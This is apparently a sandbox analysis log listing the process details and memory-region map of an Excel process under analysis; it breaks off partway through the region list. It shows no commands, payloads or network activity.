# Flog Txt Version 1 # Analyzer Version: 4.4.1 # Analyzer Build Date: Jan 14 2022 06:06:11 # Log Creation Date: 10.02.2022 06:45:14.831 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\excel.exe" page_root = "0x2dcc5000" os_pid = "0x13d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x618" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\EXCEL.EXE\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 254 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 255 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 256 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 257 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 258 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 259 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 260 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 261 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 262 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 263 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 264 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 265 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 266 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 267 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 268 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 269 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 270 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 271 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 272 start_va = 0x500000 end_va = 0x501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 273 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 274 start_va = 0x520000 end_va = 0x521fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 275 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 276 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 277 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 278 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 279 start_va = 0x570000 end_va = 0x573fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 280 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 281 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 282 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 283 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 284 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 285 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 286 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 287 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 288 start_va = 0x720000 end_va = 0x74dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 289 start_va = 0x750000 end_va = 0x753fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 290 start_va = 0x760000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 291 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 292 start_va = 0x880000 end_va = 0xa38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 293 start_va = 0xa40000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 294 start_va = 0xa80000 end_va = 0xa83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 295 start_va = 0xa90000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 296 start_va = 0xaa0000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 297 start_va = 0xab0000 end_va = 0xab1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 298 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 299 start_va = 0xad0000 end_va = 0xc57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 300 start_va = 0xc60000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 301 start_va = 0xdf0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 302 start_va = 0xe30000 end_va = 0xe30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 303 start_va = 0xe40000 end_va = 0x2818fff monitored = 0 entry_point = 0xe41000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\excel.exe") Region: id = 304 start_va = 0x2820000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 305 start_va = 0x3c20000 end_va = 0x3f56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 306 start_va = 0x3f60000 end_va = 0x4267fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll") Region: id = 307 start_va = 0x4270000 end_va = 0x4b90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll") Region: id = 308 start_va = 0x4ba0000 end_va = 0x99defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll") Region: id = 309 start_va = 0x99e0000 end_va = 0xaa12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\xlintl32.dll") Region: id = 310 start_va = 0xaa20000 end_va = 0xab1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aa20000" filename = "" Region: id = 311 start_va = 0xab20000 end_va = 0xac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ab20000" filename = "" Region: id = 312 start_va = 0xac20000 end_va = 0xacdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ac20000" filename = "" Region: id = 313 start_va = 0xace0000 end_va = 0xaddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ace0000" filename = "" Region: id = 314 start_va = 0xade0000 end_va = 0xae1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ade0000" filename = "" Region: id = 315 start_va = 0xae20000 end_va = 0xaf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae20000" filename = "" Region: id = 316 start_va = 0xaf20000 end_va = 0xaf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af20000" filename = "" Region: id = 317 start_va = 0xaf60000 end_va = 0xb05ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af60000" filename = "" Region: id = 318 start_va = 0xb060000 end_va = 0xb551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b060000" filename = "" Region: id = 319 start_va = 0xb560000 end_va = 0xb56efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 320 start_va = 0xb570000 end_va = 0xb5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b570000" filename = "" Region: id = 321 start_va = 0xb5b0000 end_va = 0xb6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5b0000" filename = "" Region: id = 322 start_va = 0xb6b0000 end_va = 0xb6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6b0000" filename = "" Region: id = 323 start_va = 0xb6f0000 end_va = 0xb72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6f0000" filename = "" Region: id = 324 start_va = 0xb730000 end_va = 0xb733fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b730000" filename = "" Region: id = 325 start_va = 0xb740000 end_va = 0xb740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b740000" filename = "" Region: id = 326 start_va = 0xb750000 end_va = 0xb75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b750000" filename = "" Region: id = 327 start_va = 0xb760000 end_va = 0xb79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b760000" filename = "" Region: id = 328 start_va = 0xb7a0000 end_va = 0xb7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7a0000" filename = "" Region: id = 329 start_va = 0xb7b0000 end_va = 0xb7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7b0000" filename = "" Region: id = 330 start_va = 0xb7c0000 end_va = 0xb7c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7c0000" filename = "" Region: id = 331 start_va = 0xb7d0000 end_va = 0xb7d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7d0000" filename = "" Region: id = 332 start_va = 0xb7e0000 end_va = 0xb7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7e0000" filename = "" Region: id = 333 start_va = 0xb7f0000 end_va = 0xb964fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 334 start_va = 0xb970000 end_va = 0xba6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b970000" filename = "" Region: id = 335 start_va = 0xba70000 end_va = 0xbb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ba70000" filename = "" Region: id = 336 start_va = 0xbb70000 end_va = 0xc36ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bb70000" filename = "" Region: id = 337 start_va = 0xc370000 end_va = 0xc46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c370000" filename = "" Region: id = 338 start_va = 0xc470000 end_va = 0xc4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c470000" filename = "" Region: id = 339 start_va = 0xc4b0000 end_va = 0xc5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c4b0000" filename = "" Region: id = 340 start_va = 0xc5b0000 end_va = 0xc5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c5b0000" filename = "" Region: id = 341 start_va = 0xc5f0000 end_va = 0xc6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c5f0000" filename = "" Region: id = 342 start_va = 0xc6f0000 end_va = 0xc72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c6f0000" filename = "" Region: id = 343 start_va = 0xc730000 end_va = 0xc82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c730000" filename = "" Region: id = 344 start_va = 0xc830000 end_va = 0xca2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c830000" filename = "" Region: id = 345 start_va = 0xca30000 end_va = 0xca6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ca30000" filename = "" Region: id = 346 start_va = 0xca70000 end_va = 0xcb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ca70000" filename = "" Region: id = 347 start_va = 0xcb70000 end_va = 0xcb70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb70000" filename = "" Region: id = 348 start_va = 0xcb80000 end_va = 0xcbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb80000" filename = "" Region: id = 349 start_va = 0xcc00000 end_va = 0xcc01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc00000" filename = "" Region: id = 350 start_va = 0xcc10000 end_va = 0xcc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc10000" filename = "" Region: id = 351 start_va = 0xcc20000 end_va = 0xcc24fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 352 start_va = 0xcc30000 end_va = 0xcc30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc30000" filename = "" Region: id = 353 start_va = 0xcc40000 end_va = 0xcc40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc40000" filename = "" Region: id = 354 start_va = 0xcc50000 end_va = 0xcc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc50000" filename = "" Region: id = 355 start_va = 0xcc60000 end_va = 0xcd35fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc60000" filename = "" Region: id = 356 start_va = 0xcd40000 end_va = 0xcd5efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd40000" filename = "" Region: id = 357 start_va = 0xcd60000 end_va = 0xcd7efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd60000" filename = "" Region: id = 358 start_va = 0xcd80000 end_va = 0xcdbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd80000" filename = "" Region: id = 359 start_va = 0xcdc0000 end_va = 0xcdcbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cdc0000" filename = "" Region: id = 360 start_va = 0xcdd0000 end_va = 0xcddbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cdd0000" filename = "" Region: id = 361 start_va = 0xcde0000 end_va = 0xcde3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 362 start_va = 0xcdf0000 end_va = 0xce2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdf0000" filename = "" Region: id = 363 start_va = 0xce30000 end_va = 0xcf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce30000" filename = "" Region: id = 364 start_va = 0xcf30000 end_va = 0xd005fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf30000" filename = "" Region: id = 365 start_va = 0xd010000 end_va = 0xd021fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 366 start_va = 0xd030000 end_va = 0xd030fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d030000" filename = "" Region: id = 367 start_va = 0xd040000 end_va = 0xd041fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d040000" filename = "" Region: id = 368 start_va = 0xd050000 end_va = 0xd14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d050000" filename = "" Region: id = 369 start_va = 0xd150000 end_va = 0xd150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d150000" filename = "" Region: id = 370 start_va = 0xd160000 end_va = 0xd160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 371 start_va = 0xd170000 end_va = 0xd170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d170000" filename = "" Region: id = 372 start_va = 0xd180000 end_va = 0xd180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d180000" filename = "" Region: id = 373 start_va = 0xd190000 end_va = 0xd1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 374 start_va = 0xd1e0000 end_va = 0xd2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d1e0000" filename = "" Region: id = 375 start_va = 0xd2e0000 end_va = 0xe2dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 376 start_va = 0xe2e0000 end_va = 0xeadffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 377 start_va = 0xeae0000 end_va = 0xebbefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 378 start_va = 0xebc0000 end_va = 0xefbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ebc0000" filename = "" Region: id = 379 start_va = 0xefc0000 end_va = 0xefc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000efc0000" filename = "" Region: id = 380 start_va = 0xefd0000 end_va = 0xf011fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 381 start_va = 0xf020000 end_va = 0xf41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f020000" filename = "" Region: id = 382 start_va = 0xf420000 end_va = 0xf4f3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeuil.ttf" filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf") Region: id = 383 start_va = 0xf500000 end_va = 0xf5e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 384 start_va = 0xf5f0000 end_va = 0xf5fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f5f0000" filename = "" Region: id = 385 start_va = 0xf600000 end_va = 0xf60ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f600000" filename = "" Region: id = 386 start_va = 0xf610000 end_va = 0xf61ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f610000" filename = "" Region: id = 387 start_va = 0xf620000 end_va = 0xfa26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f620000" filename = "" Region: id = 388 start_va = 0xfa30000 end_va = 0xfe36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fa30000" filename = "" Region: id = 389 start_va = 0xfe40000 end_va = 0x10249fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe40000" filename = "" Region: id = 390 start_va = 0x10250000 end_va = 0x10250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010250000" filename = "" Region: id = 391 start_va = 0x10260000 end_va = 0x10260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010260000" filename = "" Region: id = 392 start_va = 0x10270000 end_va = 0x102affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010270000" filename = "" Region: id = 393 start_va = 0x102b0000 end_va = 0x103affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000102b0000" filename = "" Region: id = 394 start_va = 0x103b0000 end_va = 0x1042ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000103b0000" filename = "" Region: id = 395 start_va = 0x10430000 end_va = 0x10440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 396 start_va = 0x10450000 end_va = 0x1148ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 397 start_va = 0x11490000 end_va = 0x11490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011490000" filename = "" Region: id = 398 start_va = 0x114a0000 end_va = 0x114b2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 399 start_va = 0x114c0000 end_va = 0x114c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 400 start_va = 0x114d0000 end_va = 0x114d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000114d0000" filename = "" Region: id = 401 start_va = 0x114e0000 end_va = 0x114ecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\comdlg32.dll.mui") Region: id = 402 start_va = 0x114f0000 end_va = 0x114f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000114f0000" filename = "" Region: id = 403 start_va = 0x11500000 end_va = 0x11cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011500000" filename = "" Region: id = 404 start_va = 0x11d00000 end_va = 0x121bcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011d00000" filename = "" Region: id = 405 start_va = 0x121c0000 end_va = 0x1267cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000121c0000" filename = "" Region: id = 406 start_va = 0x12680000 end_va = 0x1287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012680000" filename = "" Region: id = 407 start_va = 0x12880000 end_va = 0x12881fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012880000" filename = "" Region: id = 408 start_va = 0x12890000 end_va = 0x12890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012890000" filename = "" Region: id = 409 start_va = 0x128a0000 end_va = 0x128d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000128a0000" filename = "" Region: id = 410 start_va = 0x128e0000 end_va = 0x128e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000128e0000" filename = "" Region: id = 411 start_va = 0x128f0000 end_va = 0x128f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000128f0000" filename = "" Region: id = 412 start_va = 0x12900000 end_va = 0x12900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012900000" filename = "" Region: id = 413 start_va = 0x12910000 end_va = 